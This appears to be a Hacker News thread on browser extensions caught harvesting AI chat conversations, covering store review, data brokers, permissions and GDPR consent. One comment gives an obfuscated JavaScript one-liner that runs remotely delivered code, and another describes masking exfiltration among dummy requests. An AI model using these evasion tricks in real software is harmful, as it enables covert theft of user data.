> Firefox is committed to helping protect you against third-party software that may inadvertently compromise your data – or worse – breach your privacy with malicious intent. Before an extension receives Recommended status, it undergoes rigorous technical review by staff security experts.
https://support.mozilla.org/en-US/kb/recommended-extensions-...
I know that Google hates to pay human beings, but this is an area that needs human eyes on code, not just automated scans.
If you're feeling extra-paranoid, the XPI file can be unpacked (ZIP) and to check over the code for anything suspicious or unreasonably-complex, particularly if the browser-extension is supposed to be something simple like "move the up/down vote arrows further apart on HN". :P
While that doesn't solve the overall ecosystem issue, every little bit helps. You'll know it's time to run away if extensions become closed-source blobs.
Often they're compiled with typescript etc making manual review almost impossible.
And if you demand the developer send in the raw uncompiled stuff you have the difficulty of Google/Mozilla having to figure out how to compile an arbitrary project which could use custom compilers or compilation steps.
Remember that someone malicious wont hide their malicious code in main.ts... it's gonna be deep inside a chain of libraries (which they might control too, or might have vendored).
In JS this can be much harder to find anything suspicious when the code can be minified.
But back to Firefox: My house, my rules. So let external developers set some more strict rules that discourage the bad actors a little.
When a survey was conducted on the misuse of finances and powers, it was found that managers who did not sign the code (because they had to study it and then "forgot" to do so) were more likely to cheat than those who actually signed the documents.
I=c=>c.map?c[0]?c.reduce((a,b)=>a[b=I(b)]||a(b),self):c[1]:c
(How it works is an exercise to the reader)
The actual code to run can be delivered as an innocuous looking JavaScript array from some server, and potentially only delivered to one high value target.
> Before an extension receives Recommended status, it undergoes rigorous technical review by staff security experts.
https://support.mozilla.org/en-US/kb/recommended-extensions-...
This is what the Firefox add-ons team sent to me when one of my extensions was invited to the Recommended program:
> If you’re interested in Control Panel for Twitter becoming a Firefox Recommended Extension there are a couple of conditions to consider:
> 1) Mozilla staff security experts manually review every new submission of all Recommended extensions; this ensures all Recommended extensions remain compliant with AMO’s privacy and security standards. Due to this rigorous monitoring you can expect slightly longer review wait times for new version submissions (up to two weeks in some cases, though it’s usually just a few days).
> 2) Developers agree to actively maintain their Recommended extension (i.e. make timely bug fixes and/or generally tend to its ongoing maintenance). Basically we don't want to include abandoned or otherwise decaying content, so if the day arrives you intend to no longer maintain Control Panel for Twitter, we simply ask you to communicate that to us so we can plan for its removal from the program.
What I saw in Mozilla extensions store was anything from using minified code (what is this? it might have been useful in the late 90's on the web, but it surely is not necessary as part of an extension, that doesn't download its code from anywhere), to just full on data stealing code (reported, and mozilla removed it after 2 weeks or so).
I don't trust the review process one bit if they allow minified code in the store. For the same reason, "manual" review doesn't fill me with any extra warm confidence feeling. I can look at minified code manually myself, but it's just gibberish, and suspicious code is much harder to discern.
Also, I just stopped using third party extensions, except for 2 (violentmonkey, ublock), so I no longer do reviews. I had a script that would extract the XPI into a git repository before update, do a commit and show me a diff.
Friendly extension store for security conscious users would make it easy to review source code of the extension before hitting install or update. This is like the most security sensitive code that exists in the browser.
I think we need both human review and for somebody to create an antivirus engine for code that's on par with the heuristics of good AV programs.
You could probably do even better than that since you could actually execute the code, whole or piecewise, with debugging, tracing, coverage testing, fuzzing and so on.
> Urban Cyber Security INC
https://opencorporates.com/companies/us_de/5136044
https://www.urbancybersec.com/about-us/
I found two addresses:
> 1007 North Orange Street 4th floor Wilmington, DE 19801 US
> 510 5th Ave 3rd floor New York, NY 10036 United States
and even a phone number: +1 917-690-8380
https://www.manhattan-nyc.com/businesses/urban-cyber-securit...
They look really legitimate on the outside, to the point that there's a fair chance they're not aware what their extension is doing. Possibly they're "victim" of this as well.
If that looks use-italics "really legitimate" to you, then you might be easily scammed. I'm not saying they're not legitimate, but nothing that you shared is a strong signal of legitimacy.
It would take a perhaps a few hundred dollars a month to maintain a business that looked exactly like this, and maybe a couple thousand to buy one that somebody else had aged ahead of time. You wouldn't have to have any actual operations. Just continuously filed corporate papers, a simple brochure website, and a couple virtual office accounts in places so dense that people don't know the virtual address sites by heart.
Old advice, but be careful believing what you encounter on the internet!
> Old advice, but be careful believing what you encounter on the internet!
Try to not be terminally cringe either?
And also, why extension for vpn? I live in country where almost everybody uses vpn just to watch YouTube and read twitter, and none of my friends uses some strange extensions. There are open source software for that - from real vpn like wireguard, to proxy software like nekoray/v2raytun. Browser extension is the last thing I would install to be private.
What, there's an issue because I'm not being underhanded about it like that swatcoder guy?
> And also, why extension for vpn?
Why are you asking me that?
> What, there's an issue because I'm not being underhanded about it like [that] guy?
Wow you’ve put something into words here I never consciously realized is an unwritten rule. Sounds silly but yea you’re 100% right; that seems to be exactly the game we play.
For better or for worse.
HN guidelines: Assume good faith.
Based on what? The same instinct that told you having an address and phone number makes an entity legitimate? The chance the people behind this company live in the US is incredibly low. And even if they do live in the US what exactly would they be getting charged with and who would care enough to charge them?
The NY address is a virtual office.
https://themillspace.com/wilmington/
The DE address is a virtual office plus coworking facility.
You run a business from home but do not want to reveal you personal address to the world.
You are from a country that Stripe doesn’t support but need to make use of their unique capabilities like Stripe Connect, then you might sign up for Stripe Atlas to incorporate in the USA so you can do business directly with Stripe. Your US business then needs a US physical address ie virtual office.
Etc
> This company has been on researchers' radar before. Security researchers Wladimir Palant and John Tuckner at Secure Annex have previously documented BiScience's data collection practices. Their research established that:
> BiScience collects clickstream data (browsing history) from millions of users Data is tied to persistent device identifiers, enabling re-identification The company provides an SDK to third-party extension developers to collect and sell user data
> BiScience sells this data through products like AdClarity and Clickstream OS
> The identical AI harvesting functionality appears in seven other extensions from the same publisher, across both Chrome and Edge:
Hmm.
> They look really legitimate on the outside
Hmm, what, no.
We have a data collection company, thriving financially on lack of privacy protections, indiscriminant collection and collating of data, connected to eight data siphoning "Violate Privacy Network" apps.
And those apps are free... Which is seriously default sketchy if you can't otherwise identify some obviously noble incentives to offer free services/candy to strangers.
Once is happenstance, twice is coincidence, three (or eight) times is enemy action.
The only thing that could possibly make this look any worse is discovering a connection to Facebook.
1000 N. WEST ST. STE. 1501, WILMINGTON, New Castle, DE, 19801
It almost matches this law firms address but not quite.
https://www.skjlaw.com/contact-us/
Brandywine Building 1000 N. West Street, Suite 1501 Wilmington DE 19801
BiScience is an Israeli company.
Sometimes things don't make sense to me, like how "Uber Driver app access background location and there is no way to change that from settings" - https://developer.apple.com/forums/thread/783227
Or they'd tell WhatsApp to allow granting microphone permissions for one single call, instead of requesting permanent microphone permissions. All apps that I know of respect the flow of "Ask every time", all but Meta's app.
Google just doesn't care.
Or even better, mix in some real names and phone numbers but change all the other details. I want data brokers to think I live in 8 different countries. I want my email address to show up for 50 different identities. Good luck sorting that out.
The developer documentation is actually pretty clear about this: https://developer.apple.com/documentation/bundleresources/ch...
What we actually need is runtime permissions that fire when the extension tries to do something suspicious - like exfiltrating data to domains that aren't related to its stated function. iOS does this reasonably well for apps. Extensions should too.
The "Recommended" badge helps but it's a bandaid. If an extension needs "read and change all data on all websites" to work, maybe it shouldn't work.
For example there's no need for the "inject custom JS or CSS into websites" extensions to need permission to read and write data on every single website you visit. If you only want to use them to make a few specific sites more accessible to you that doesn't mean you're okay with them touching your online banking. Especially when most of these already let you define specific URLs or patterns each rule/script should apply to.
I understand that there are still vectors for data exfiltration when the same extension has permissions on two different sites and that "code injection as a service" is inherently risky (although cross-origin policies can already lock this down somewhat) but in 2025 I'd hope we could have a more granular permission model for browser extensions that actually supports sandboxing.
Is this where we’re at with AI?
Putting a token predictor in the mix — especially one incapable of any actual understanding — seems like a natural evolution.
Absolved of burden of navigating our noisy, incomplete and dissonant thoughts, we can surrender ourselves to the oracle and just obey.
For example HBR recently reported the number 1 use for ChatGPT is "Therapy/companionship"
"Let us handle all your internet traffic.. you can trust us.. we're free!"
No thank you.
Meanwhile reputable VPN provider like mullvad offer there service without KYC and leave feds empty handed when they knock on there doors.
https://mullvad.net/en/blog/mullvad-vpn-was-subject-to-a-sea...
That's why TLS exists, after all. All Internet traffic is wiretapped.
> That's why TLS exists, after all.
That protects you if you're using standard methods to connect. Installed software gets to bypass it.
Maybe some
But it's cumbersome.
> "Let us handle all your internet traffic.. you can trust us.. []"
TLS does not help, when most Internet traffic is passed through a single entity, which by default will use an edge TLS certificate and re-encrypt all data passing through, so will have decrypted plain text visibility to all data transmitted.
but other than that I would never trust anything other than Mullvad/IVPN/ProtonVPN
VPNs are just one example. How many chrome extensions do you have that you don't use all the time, like adblockers, cookie consent form handlers or dark mode?
But considering those are browser extensions, I think they can just inspect any traffic they want on the client side (if they can get such broad permissions approved, which is probably not too hard).
[1] https://secureannex.com/blog/cyberhaven-extension-compromise.... [2] https://secureannex.com/blog/sclpfybn-moneitization-scheme/ (referenced in the article)
The scary part is these extensions had Google's "Featured" badge. Manual review clearly isn't enough when companies can update code post-approval. We need continuous monitoring, not just one-time vetting.
For anyone building privacy-focused tools: making your data collection transparent and your business model clear upfront is the only way to build trust. Users are getting savvier about this.
There has to be a better system. Maybe a public extension safety directory?
Additionally, Brave a chromium based browser has adblocking built into the browser itself meaning it is not affected by webextention changes and does not require trusting an additional 3rd party.
I do think security researchers would be able to figure out what scripts are downloaded and run.
Regardless, none of this seems to matter to end users whether the script is in the extension or external.
If so, I feel like something that limited is hardly even a browser extension interface in the traditional sense.
So you can still do everything you could before, but it’s not as hidden anymore
In much of the physical world thankfully there's laws and pretty-effective enforcement against people clubbing you on the head and taking your stuff, retail stores selling fake products and empty boxes, etc.
But the tech world is this ever-boiling global cauldron of intangible software processes and code - hard to get a handle on what to even regulate. Wish people would just be decent to each other, and that that would be culturally valued over materialism and moneymaking by any possible means. Perhaps it'll make a comeback.
I spend a lot of time trying to think of concrete ways to improve the situation, and would love to hear people's ideas. Instinctively I tend to agree it largely comes down to treating your users like human beings.
Get as off-grid as you possibly can. Try to make your everyday use of technology as deterministic as possible. The free market punishes anyone who “respects their users”. Your best bet is some type of tech co-op funded partially by a billionaire who decided to be nice one day.
Part of the problem has been that there's a mountain to climb vis a vis that extra ten miles to take something that 'works for me' and turn it into 'gramps can install this and it doesn't trigger his alopecia'.
Rather, that was the problem. If you're looking for a use case for LLMs, look no further. We do actually have the capacity to build user-friendly stuff at a fraction of the time cost that we used to.
We can make the world a better place if we actually give a shit. Make things out in the open, for free, that benefit people who aren't in tech. Chip away at the monopolies by offering a competitive service because it's the right thing to do and history will vindicate you instead of trying to squeeze a buck out of each and every thing.
I'm not saying "don't do a thing for money". You need to do that. We all need to do that. But instead of your next binge watch or fiftieth foray into Zandronum on brutal difficulty, maybe badger your llm to do all the UX/UI tweaks you could never be assed to do for that app you made that one time, so real people can use it. I'm dead certain that there are folks reading this now who have VPN or privacy solutions they've cooked up that don't steal all your data and aren't going to cost you an arm and a leg. At the very least, someone reading this has a network plugin that can sniff for exfiltrated data to known compromised networks (including data brokers) - it's probably just finicky to install, highly technical, and delicate outside of your machine. Tell claude to package that shit so larry luddite can install it and reap the benefits without learning what a bash is or how to emacs.
The island states have been dethroned.
Brave New World was apathy: the system was comfortable, Soma was freely available and there was a whole system to give disruptive elements comfortable but non disruptive engagement.
The protagonist in Brave New World spends a lot of time resenting the system but really he just resents his deformity, wanted what it denied him in society, and had no real higher criticisms of it beyond what he felt he couldn't have.
You might even imagine 1984's society evolving into Brave New World's as the mechanisms of oppression are gradually refined. Indeed, Aldous Huxley himself suggested as much in a letter to Orwell [1].
[1] https://gizmodo.com/read-aldous-huxleys-review-of-1984-he-se...
Bonus points if the government agency can leave most of the work to an ostensibly separate private company, while maintaining a "mutual understanding" of government favors for access.
Articles like this do a decent job of bringing awareness, but we all know Google will do absolutely nothing
Sometimes knowing tech makes us think we're somehow better and can bypass high level wisdom.
> We asked Wings, our agentic-AI risk engine, to scan for browser extensions with the capability to read and exfiltrate conversations from AI chat platforms.
A review page [2] mentions that this add-on is a peer-to-peer vpn, not having its own dedicated servers that already makes it suspicious.
[1] https://web.archive.org/web/20250126133131/https://addons.mo...
Or that the review happened before the code harvested all the LLM conversations and never got reviewed after it was updated.
Think: is my brand getting mentioned more in AI chats? Are people associating positive or negative feelings towards it? Are more people asking about this topic lately?
Could one just feed the extension and a good prompt to claude to do this? Seems like automation CAN sniff this kind of stuff out pretty easily.
With those extensions the user's data and internet are the product, most if not all are also selling residential IP access for scrapers, bots, etc.
Good thing Google is protecting users by taking down such harmful extensions as ublock origin instead.
They take a 5.5% fee whenever you buy credits. There's also a discount for opting-in to share your prompts for training.
That can be circumnavigated by bundling the conversations into one POST to an API endpoint, along with a few hundred calls to several dummy endpoints to muddy the waters. Bonus points if you can make it look like an normal-passing update script.
It'll still show up in the end, but at this point your main goal is to delay the discovery as much as you can.
Or you mean the web sites packed with a copy of chromium?
How is it possible to have extensions this egregiously malicious in the new system?
> The thought didn't let go. As a security researcher, I have the tools to answer that question.
What huh, no you don't! As a security researcher you should know better!
No. When you want to increase your security, you install fewer tools.
Each tool increases your exposure. Why is the security industry full of people who don't get this?
If you really are a security researcher then that's not true. You already know all this.
Trusting Google with your privacy is like putting the fox in charge of the henhouse.
(for firefox/derivatives anyways...)
70 thousand users on what I would actually call "privacy" extensions.
Bit of a misleading title then.
“I know, let’s have an AI do all the work for us instead. Let’s take a coffee break.”
If you are not paying for the product, you are the product.
And um, a boy and a girl.
...
Anyway, the thing was that one day they started acting kinda funny. Kinda, weird.
They started being seen exchanging tokens of affection.
And it was rumoured they were engaging in...
If Urban VPN is indeed closely affiliated with the data broker, a GDPR fine might also affect that company too given how these fines work. There is a high bar for the kind of misconduct that would result in a fine but it seems plausible that they're being knowingly and deliberately deceptive and engaging in widespread data collection that is intentionally invasive and covert. That would be a textbook example for the kind of behavior the GDPR is meant to target with fines.
The same likely applies to the other extensions mentioned in the article. Yes, "if the product is free, you are the product" but that is exactly why the GDPR exists. The problem isn't that they're harvesting user data but that they're being intentionally deceptive and misleading in their statements about this, claim they are using consent as the legal basis without having obtained it[0], and they're explicitly contradicting themselves in their claims ("we're not collecting sensitive information that would need special consideration but if we do we make sure to find it and remove it before sharing your information but don't worry because it's mostly used in aggregate except when it isn't"). Just because you except some bruising when picking up martial arts as a hobby doesn't mean your sparring partner gets to pummel your face in when you're already knocked out.
[0]: Because "consent" seems to be a hard concept for some people to grasp: it's literally analogous to what you'd want to establish before having sex with someone (though to be fair: the laws are much more lenient about unclear consent for sex because it's less reasonable to expect it to be documented with a paper trail like you can easily do for software). I'll try to keep it SFW but my place of work is not your place of work so think carefully if you want to copy this into your next Powerpoint presentation.
Does your prospective sexual partner have any reason to strongly believe that they can't refuse your advances because doing so would limit their access to something else (e.g. you took them on a date in your car and they can't afford a taxi/uber and public transport isn't available so they rely on you to get back home, aka "the implication")? Then they can't give you voluntary consent because you're (intentionally or not) pressuring them into it. The same goes if you make it much harder for them to refuse than to agree (I can't think of a sex analogy for this because this seems obvious in direct human interactions but somehow some people still think hiding "reject all non-essential" is an option you are allowed to hide between two more steps when the "accept all" button is right there even if the law explicitly prohibits these shenanigans).
Is your prospective sexual partner underage or do they appear extremely naive (e.g. you suspect they've never had any sex ed and don't know what having sex might entail or the risks involved like pregnancy, STIs or, depending on the acts, potential injuries)? Then they probably can't give you informed consent because they don't fully understand what they're consenting to. For data processing this would be failure to disclose the nature of the collection/processing/storage that's about to happen. And no, throwing the entire 100 page privacy policy at them with a consent dialog at the start hardly counts the same way throwing a biology textbook at a minor doesn't make them able to consent.
Is your prospective sexual partner giving you mixed signals but seems to be generally okay with the idea of "taking things further"? Then you're still missing specific consent and better take things one step at a time checking in on them if they're still comfortable with the direction you're taking things before you decide to raw dog their butt (even if they might turn out to be into that). Or in software terms, it's probably better to limit the things you seek consent for to what's currently happening for the user (e.g. a checkbox on a contact form that informs them what you actually intend to do with that data specifically) rather than try to get it all in one big consent modal at the start - this also comes with the advantage that you can directly demonstrate when and how the specific consent relevant to that data was obtained when later having to justify how that data was used in case something goes wrong.
Is your now-active sexual partner in a position where they can no longer tell you to stop (e.g. because they're tied up and ball-gagged)? Then the consent you did obtain isn't revokable (and thus again invalid) because they need to be able to opt out (this is what "safe words" are for and why your dentist tells you to raise your hand where they can see it if you need them to stop during a procedure - given that it's hard to talk with someone's hands in your mouth). In software this means withdrawing consent (or "opting out") should be as easy as it was to give it in the first place - an easy solution is having a "privacy settings" screen easily accessible in the same place as the privacy policy and other mandatory information that at the very least covers everything you stuffed in that consent dialog I told you not to use, as well as anything you tucked away in other forms downstream. This also gives you a nice place to link to at every opportunity to keep your user at ease and relaxed to make the journey more enjoyable for both of you.
(Yes it really is AI-written / AI-assisted. If your AI detectors don’t go off when you read it you need to be retrained.)
There are honest ways to make a living. In this case honest is “being transparent” about the way data is handled instead of using newspeak.